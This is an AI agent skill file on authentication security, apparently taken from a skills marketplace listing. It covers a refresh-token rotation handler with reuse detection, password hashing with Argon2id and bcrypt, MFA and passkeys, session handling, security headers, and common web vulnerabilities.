app.post('/auth/refresh', async (req, res) => {
  const oldRefreshToken = req.cookies.refresh_token;

  try {
    // 1. Validate refresh token (check signature, expiry)
    const decoded = jwt.verify(oldRefreshToken, publicKey, {
      algorithms: ['RS256'],
      issuer: 'https://auth.example.com',
    });

    // 2. Look up token in database (we store hashed refresh tokens)
    const tokenHash = crypto.createHash('sha256').update(oldRefreshToken).digest('hex');
    const tokenRecord = await db.refreshTokens.findOne({
      tokenHash,
      userId: decoded.sub,
    });

    if (!tokenRecord) {
      throw new Error('Refresh token not found');
    }

    // 3. CRITICAL: Detect token reuse (possible theft)
    if (tokenRecord.isUsed) {
      // Token was already used - this is a REUSE ATTACK
      await db.refreshTokens.deleteMany({ userId: decoded.sub }); // Revoke ALL tokens
      await logSecurityEvent('REFRESH_TOKEN_REUSE_DETECTED', {
        userId: decoded.sub,
        tokenId: decoded.jti,
        ip: req.ip,
        userAgent: req.headers['user-agent'],
      });

      // Send alert to user's email
      await sendSecurityAlert(decoded.sub, 'Token theft detected - all sessions terminated');

      return res.status(401).json({
        error: 'token_reuse',
        error_description: 'Refresh token reuse detected - all sessions revoked',
      });
    }

    // 4. Mark old token as used (ATOMIC operation before issuing new tokens)
    await db.refreshTokens.updateOne(
      { tokenHash },
      {
        $set: { isUsed: true, lastUsedAt: new Date() },
      }
    );

    // 5. Generate new tokens
    const newAccessToken = jwt.sign(
      {
        sub: decoded.sub,
        scope: decoded.scope,
        exp: Math.floor(Date.now() / 1000) + 15 * 60,
      },
      privateKey,
      { algorithm: 'RS256' }
    );

    const newRefreshToken = jwt.sign(
      {
        sub: decoded.sub,
        scope: decoded.scope,
        exp: Math.floor(Date.now() / 1000) + 7 * 24 * 60 * 60, // 7 days
        jti: crypto.randomUUID(),
      },
      privateKey,
      { algorithm: 'RS256' }
    );

    // 6. Store new refresh token (hashed)
    const newTokenHash = crypto.createHash('sha256').update(newRefreshToken).digest('hex');
    await db.refreshTokens.create({
      userId: decoded.sub,
      tokenHash: newTokenHash,
      isUsed: false,
      expiresAt: new Date(Date.now() + 7 * 24 * 60 * 60 * 1000),
      createdAt: new Date(),
      userAgent: req.headers['user-agent'],
      ipAddress: req.ip,
    });

    // 7. Set new tokens as cookies
    res.cookie('access_token', newAccessToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000,
    });

    res.cookie('refresh_token', newRefreshToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 7 * 24 * 60 * 60 * 1000,
      path: '/auth/refresh',
    });

    res.json({ success: true });
  } catch (error) {
    // Clear invalid cookies
    res.clearCookie('refresh_token');
    res.status(401).json({ error: 'invalid_token' });
  }
});

Database Schema (Refresh Tokens):

{
  userId: 'user_12345',
  tokenHash: 'sha256_hash_of_refresh_token', // NEVER store plaintext
  isUsed: false, // Set to true when token is used for refresh
  expiresAt: ISODate('2026-02-01T00:00:00Z'),
  createdAt: ISODate('2026-01-25T00:00:00Z'),
  lastUsedAt: null, // Updated when isUsed set to true
  userAgent: 'Mozilla/5.0...',
  ipAddress: '192.168.1.1',
  jti: 'uuid-v4', // Matches JWT 'jti' claim
}

Password Hashing (2026 Best Practices)

Recommended: Argon2id

Winner of Password Hashing Competition (2015)
Resistant to both GPU cracking and side-channel attacks
Configurable memory, time, and parallelism parameters

// Argon2id example (Node.js) import argon2 from 'argon2';

// Hash password const hash = await argon2.hash(password, { type: argon2.argon2id, memoryCost: 19456, // 19 MiB timeCost: 2, parallelism: 1, });

// Verify password const isValid = await argon2.verify(hash, password);

Acceptable Alternative: bcrypt

Still secure but slower than Argon2id for same security level
Work factor: minimum 12 (recommended 14+ in 2026)

// bcrypt example import bcrypt from 'bcryptjs';

const hash = await bcrypt.hash(password, 14); // Cost factor 14 const isValid = await bcrypt.compare(password, hash);

NEVER use:

MD5, SHA-1, SHA-256 alone (not designed for passwords)
Plain text storage
Reversible encryption

Multi-Factor Authentication (MFA)

Types of MFA:

TOTP (Time-based One-Time Passwords)

Apps: Google Authenticator, Authy, 1Password
6-digit codes that rotate every 30 seconds
Offline-capable

WebAuthn/FIDO2 (Passkeys)

Most secure option (phishing-resistant)
Hardware tokens (YubiKey) or platform authenticators (Face ID, Touch ID)
Public key cryptography, no shared secrets

SMS-based (Legacy - NOT recommended)

Vulnerable to SIM swapping attacks
Use only as fallback, never as primary MFA

Backup Codes

Provide one-time recovery codes during MFA enrollment
Store securely (hashed in database)

Implementation Best Practices:

Allow multiple MFA methods per user
Enforce MFA for admin/privileged accounts
Provide clear enrollment and recovery flows
Never bypass MFA without proper verification

Passkeys / WebAuthn

Why Passkeys:

Phishing-resistant (cryptographic binding to origin)
No shared secrets to leak or intercept
Passwordless authentication
Synced across devices (Apple, Google, Microsoft ecosystems)

Implementation:

Use @simplewebauthn/server (Node.js) or similar libraries
Support both platform authenticators (biometrics) and roaming authenticators (security keys)
Provide fallback authentication method during transition

WebAuthn Registration Flow:

Server generates challenge
Client creates credential with authenticator
Client sends public key to server
Server stores public key associated with user account

WebAuthn Authentication Flow:

Server generates challenge
Client signs challenge with private key (stored in authenticator)
Server verifies signature with stored public key

Session Management

Secure Session Practices:

Use secure, HTTP-only cookies for session tokens
- Set-Cookie: session=...; Secure; HttpOnly; SameSite=Strict
Implement absolute timeout (e.g., 24 hours)
Implement idle timeout (e.g., 30 minutes of inactivity)
Regenerate session ID after login (prevent session fixation)
Provide "logout all devices" functionality

Session Storage:

Server-side session store (Redis, database)
Don't store sensitive data in client-side storage
Implement session revocation on password change

Security Headers

Essential HTTP Security Headers:

Strict-Transport-Security: max-age=31536000; includeSubDomains (HSTS)
X-Content-Type-Options: nosniff
X-Frame-Options: DENY or SAMEORIGIN
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block (legacy support)

Common Vulnerabilities to Prevent

Injection Attacks:

Use parameterized queries (SQL injection prevention)
Validate and sanitize all user input
Use ORMs with built-in protection

Cross-Site Scripting (XSS):

Escape output in templates
Use Content Security Policy headers
Never use eval() or innerHTML with user input

Cross-Site Request Forgery (CSRF):

Use CSRF tokens for state-changing operations
Verify origin/referer headers
Use SameSite cookie attribute

Broken Authentication:

Enforce strong password policies
Implement account lockout after failed attempts
Use MFA for sensitive operations
Never expose user enumeration (same error for "user not found" and "invalid password")

Consolidated Skills

This expert skill consolidates 1 individual skills:

auth-security-expert

Related Skills

security-architect - Threat modeling (STRIDE), OWASP Top 10, and security architecture patterns

Iron Laws

NEVER store JWTs in localStorage — localStorage is accessible to any JavaScript on the page, making it trivially vulnerable to XSS; always use httpOnly secure cookies.
ALWAYS validate JWT signature before using any claims — an unvalidated JWT can be forged; never decode claims without first verifying the signature against the expected algorithm and key.
NEVER use HS256 with a client-accessible secret — HS256 shared secrets are exposed when the client holds them; use RS256 or ES256 so only the server can sign.
NEVER allow the implicit OAuth grant — the implicit grant is deprecated in OAuth 2.1 due to token leakage in redirect fragments; always use authorization code + PKCE.
ALWAYS set JWT access token expiry to 15 minutes or less — long-lived access tokens remain valid after compromise; use refresh token rotation to maintain sessions without long-lived tokens.

Anti-Patterns

Anti-Pattern	Why It Fails	Correct Approach
JWT stored in localStorage	XSS-accessible; any script can steal the token	Use httpOnly secure cookies
No JWT signature validation	Forged tokens are accepted silently	Always call verify(), never just decode()
HS256 with client secret	Secret is embedded in client code; trivially extracted	Use RS256/ES256 with server-side private key
Implicit OAuth grant	Token in URL fragment leaks via referrer headers	Authorization code + PKCE flow
Access token lifetime >15 minutes	Stolen tokens remain valid too long after breach	Set exp to 5-15 minutes; use refresh token rotation

Memory Protocol (MANDATORY)

Before starting:

cat .claude/context/memory/learnings.md

After completing: Record any new patterns or exceptions discovered.

ASSUME INTERRUPTION: Your context may reset. If it's not in memory, it didn't happen.

Weekly Installs

Repository

oimiragieo/agent-studio

GitHub Stars

First Seen

Jan 27, 2026

Security Audits

Gen Agent Trust HubPass SocketWarn SnykPass

Installed on

github-copilot68

gemini-cli67

codex67

opencode67

kimi-cli66

amp66

Linux云主机安全托管指南：从SSH加固到HTTPS部署

46,900 周安装